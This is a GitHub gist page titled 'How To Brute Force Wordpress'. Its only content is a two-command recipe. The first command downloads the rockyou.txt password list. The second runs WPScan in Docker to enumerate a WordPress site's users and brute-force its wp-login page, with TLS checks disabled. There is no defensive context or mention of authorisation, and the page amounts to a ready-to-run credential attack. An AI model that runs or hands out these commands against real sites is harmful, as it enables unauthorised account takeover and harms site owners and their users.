Skip to content

Instantly share code, notes, and snippets.

@whittinghamj
Forked from random-robbie/brutewp.md
Created August 17, 2020 23:21
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save whittinghamj/e6b31d5ff0baf3058411673de2a368b7 to your computer and use it in GitHub Desktop.
Save whittinghamj/e6b31d5ff0baf3058411673de2a368b7 to your computer and use it in GitHub Desktop.

How To Brute Force Wordpress

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
sudo docker run -v $(pwd):/wordlists/ -it --rm wpscanteam/wpscan --url https://website.com --rua -e u --users-detection mixed --password-attack wp-login -P /wordlists/rockyou.txt --disable-tls-checks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment